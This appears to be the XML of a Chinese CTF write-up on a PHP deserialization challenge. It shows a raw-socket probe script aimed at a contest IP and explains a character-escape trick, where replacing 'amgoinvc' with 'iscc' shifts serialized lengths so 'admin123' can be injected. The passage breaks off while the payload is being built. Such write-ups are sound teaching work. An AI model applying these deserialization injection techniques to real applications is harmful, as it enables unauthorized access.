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t xml:space="preserve">0. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目总体分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本题属于非常经典的“两阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化”考点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察题目主页的背景描述，其实能够提取出两条核心提示：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“前殿守着能够吞噬字符的文字陷阱”</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这句话往往暗示了字符过滤、替换以及长度逃逸等相关考点。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“后殿则由一连串会自行苏醒的对象守卫看守”</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这部分则指向了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的魔术方法调用链，即我们熟知的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，在刚接触到这道题时，首要任务并非盲目地进行目录爆破，正确的思路应该是：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首先获取并分析主页内容。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寻找是否存在可见的访问入口、传参途径或者源码泄露情况。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针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目，着重排查以下几个方面：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highlight_file(__FILE__)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unserialize()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魔术方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup/__destruct/__toString/__get/__invoke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各种正则匹配、字符串过滤与替换机制、白名单校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从主页我们可以直接发现两个文件路径：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rune_trial.php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mechanism_chamber.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这几乎就是在明示：在第一阶段获取关键线索，在第二阶段取得最终的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="11" w:name="header-n35"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：确保稳定获取页面响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于该题目所处端口对常规的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请求兼容性较差，单纯使用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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">偶尔会返回空结果。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了便于后续的稳定测试，我编写了一段精简的底层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测代码，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接直接发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体代码如下，文件保存为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">probe_http.py</w:t>
        </w:r>
      </w:hyperlink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"39.105.213.28"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"--method"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"--path"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"--header"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"--data"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args.data.encode()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HTTP/1.0"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"User-Agent: probe_http.py"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"Accept: */*"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body:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        headers.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Content-Length: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headers.append(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headers.extend(args.header)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.join(headers)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body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socket.create_connection((args.host, args.port),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sock:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        sock.sendall(req)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chunks.append(chunk)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    sys.stdout.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.join(chunks))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p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其调用方式十分便捷：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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rune_trial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php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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mechanism_chamber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php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此处的重点不在于这段代码的具体实现，而在于解决问题的思维方式：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当常规工具表现不稳定时，应当尝试自行构造并掌控底层的请求报文。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在解决</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方向的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目时，构建一个“稳定且易于复现”的通信手段是极为关键的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n48"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从主页获取的线索</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功请求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目录后，页面展示了两个入口按钮：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第一阶段对应：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rune_trial.php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第二阶段对应：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mechanism_chamber.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然第一阶段的按钮在浏览器前端呈现为不可点击状态，但这仅仅是前端层面的限制。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在做</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF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题目时，前端页面的按钮状态往往无关紧要，我们只需直接向目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起请求即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这里分享一个关键的新手避坑指南：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只要确认后端的接口或路由是客观存在的，就完全没必要理会前端的“按钮置灰”、“拦截弹窗”或是“禁用操作”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此我们直接发起请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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rune_trial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php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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mechanism_chamber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php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求后可以看到，这两个页面均直接将自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源代码进行了高亮展示。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个现象进一步印证了：本题的核心考查点在于代码审计，而非耗费时间去扫描隐藏目录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="14" w:name="header-n63"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一核心思路：典型的“反序列化字符逃逸”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先分析第一阶段的核心代码逻辑：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nameA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'relic_manifest.php'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"成功！文件名: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p2(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"bnhpjowd"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$replace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'iscc'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$search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$replace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$passwd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'amgoinvc'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input'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nameA(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$passwd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$obj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p1(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$ser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3" w:name="header-n66"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">业务逻辑通俗解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器端主要执行了以下流程：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接收用户输入的参数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校验参数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中是否包含特定的子串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amgoinvc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将这两个参数作为属性实例化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nameA($x, $y)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对象。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对实例化后的对象执行序列化操作。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针对序列化生成的字符串进行特定的字符替换。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将完成替换操作后的字符串再次传入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倘若经过反序列化重构出的对象满足</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$y === 'admin123'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条件，便会打印出通往下一阶段的关键提示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此可见，这一阶段的核心诉求十分清晰：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须构造特定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload，使得在最后一步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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行后，对象实例的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属性值被篡改为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header-n87"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一破局点：替换导致实际长度与序列化标记脱节</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="15" w:name="header-n88"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逆向推导替换规则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审视下面这段逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"bnhpjowd"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通过将每个字符的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">码递减</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1，我们可以得出：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b -&gt; a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n -&gt; m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h -&gt; g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 -&gt; o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j -&gt; i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o -&gt; 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w -&gt; v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d -&gt; c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终拼接出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变量值为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amgoinvc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">紧接着执行了替换操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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'amgoinvc'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'iscc'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$serialized_string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这就意味着：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被替换的目标串长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8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替换后的目标串长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此可知，每发生一次匹配替换，整个字符串的有效长度就会缩减</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n121"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞成因剖析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PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的原生序列化数据结构中，字符串类型是包含长度声明的，例如：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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"abcdefgh"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此处的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即代表后续字符串的预设长度。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倘若初始内容长度为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8，随后在底层被强行替换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字符，然而数字标示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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">却未做同步修改，那么在进行反序列化解析时，引擎便会依据“8”这个旧标记，越界向后强行多读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这就构成了此类反序列化字符逃逸题目的根本解法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当字符替换使得“实际文本缩水”时，反序列化机制依旧恪守“原始长度标记”进行截取。这必然会导致后续原本用作语法结构的字符被当作普通字符串“吃掉”，进而引发对象属性的解析错位。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header-n129"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造起手式</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="header-n130"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">还原初始序列化形态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w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nameA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类拥有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两个公共成员变量，因而其标准序列化形态大致如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ConstantTok"/>
        </w:rPr>
        <w:t xml:space="preserve">O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"nameA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Othe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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"x"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;d&gt;"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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"y"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
